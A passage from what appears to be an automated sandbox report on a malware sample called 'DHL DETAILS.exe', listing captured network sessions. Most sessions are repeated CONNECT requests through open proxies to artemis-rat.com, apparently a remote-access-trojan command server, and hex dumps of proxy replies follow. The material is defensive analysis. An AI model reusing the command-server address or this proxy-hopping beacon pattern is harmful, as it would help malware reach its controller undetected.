                                                                                    Mar 9, 2024 13:14:14.878458977 CET162INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5
                                                                                    Mar 9, 2024 13:14:14.878571033 CET1286INData Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31
                                                                                    Data Ascii: |0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
                                                                                    Mar 9, 2024 13:14:14.878593922 CET1286INData Raw: 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb 88 9b 5a 25 be 77 09 e1 a7 6a 4e 11 75 b9 1e 4d f1 00 1b 6a 66 79 8e c3 6e d8 6d a2 22 a2 6d 05 fb 2c f2 f1 50 e5 a0 d1 d8 9f 35 7d fc 70 ab 59 2a 02 f1 be b0 d3
                                                                                    Data Ascii: gw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!X0*H0W10UBE10UGlobalS
                                                                                    Mar 9, 2024 13:14:14.878612041 CET574INData Raw: 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b 7a c8 c0 18 37 fa 25 51 ac ec 68 bf b2 c8 49 fd 5a 9a ca 01
                                                                                    Data Ascii: 4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$
                                                                                    Mar 9, 2024 13:14:14.890027046 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 09 8a 8a 50 76 1b 41 10 47 59 90 aa d7 f8 92 01 ab 65 30 75 6b 11 99 8a c9 f4 a7 5f 39 e6 bb 75 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5f ec 9c e0 cd 44 f8 34 b3 ed 10 32 73 d0 29 44 25 4a c5 68 99
                                                                                    Data Ascii: %! PvAGYe0uk_9u(_D42s)D%JhRRI+
                                                                                    Mar 9, 2024 13:14:15.200460911 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 ef f1 5c 83 12 d8 e4 38 e5 74 fc a1 e4 f1 c9 5b db 6c ab 47 35 3e 40 bb fc 14 a6 3c c3 c3 96 14 08 b0 d9 43 49 63 6a c0 cf ef 50 7e 90 8c 32 a7 ee ee 64 96 ab 5a 6c f8 b9 98 b6 97 6c df a7 9e 1d 13 3b
                                                                                    Data Ascii: \8t[lG5>@<CIcjP~2dZll;/A]IC%jr* NGDc~UX\r5#?@lrDa+$^4@k ({,QI`X[
                                                                                    Mar 9, 2024 13:14:15.213326931 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 3e e3 c1 60 67 93 3f d4 29 1c 49 24 70 33 de 8d 2d 62 0d 3a d8 45 26 55 2b 60 49 22 38 83 e8 88 cc b7 ee 29 ab 2c 24 a9 9c 2c 29 f7 f0 d8 d8 d7 89 09 84 4c cd 5e 29 9f b3 42 74 db 30 9b e9 f9 41 ef 24 1c 06
                                                                                    Data Ascii: >`g?)I$p3-b:E&U+`I"8),$,)L^)Bt0A$03A(b@:]Y<@vk[TJRmG5>&8@R1`3"*L{HqgEAXu-$eX?zC4nr.l
                                                                                    Mar 9, 2024 13:14:15.529763937 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 65 39 1f 29 c7 93 b9 28 d2 53 7d a8 2a 15 70 2a 31 b9 cf da 53 7e 35 09 c0 9e 85 6d e0 2c b7 f1 58 ff a7 8c 4c 2f 1b c9 7f 6a 93 2c c6 a6 16 87 8e 3c 37 9a 92 d2 25 9c 37 d2 88 65 27 ae ff ca c4 5a 07 16 8f
                                                                                    Data Ascii: qe9)(S}*p*1S~5m,XL/j,<7%7e'ZyC {v,@\hxpM>q@]?Erf0$f?wD,<4Mi%\hw)9JE>?Z!\i^n>! ~7"Q=bL


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    500192.168.2.55152545.120.178.19710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.252367020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    501192.168.2.551550107.181.148.22760876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.252425909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.656856060 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    502192.168.2.55152643.131.248.165156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.253145933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    503192.168.2.551545136.243.82.12110826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.253317118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.644308090 CET84INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Transfer-Encoding: chunked


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    504192.168.2.551538150.109.243.156156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.254183054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    505192.168.2.551511138.36.150.1510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.257644892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    506192.168.2.551530185.81.153.16233896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.259669065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    507192.168.2.551586172.67.209.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.260004997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.414155006 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    508192.168.2.551546118.218.126.5494006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.260303020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.575565100 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Content-Type: text/html
                                                                                    Server: Zscaler/6.2
                                                                                    Cache-Control: no-cache
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Content-length: 13597
                                                                                    Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68
                                                                                    Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscloud.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    509192.168.2.551533103.23.100.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.260947943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    510192.168.2.55010664.227.108.25319086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.261126041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.270781040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    511192.168.2.551542120.76.42.20988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.266668081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.606056929 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    512192.168.2.551515139.59.1.1480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.267961025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.067322969 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    513192.168.2.55156745.43.81.16458116352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.277324915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.646862030 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    514192.168.2.55153593.90.212.241536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.280941963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    515192.168.2.551569203.74.125.1888886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.289791107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.821240902 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    516192.168.2.551289184.170.249.6541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.305686951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    517192.168.2.551622104.19.120.84806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.325807095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
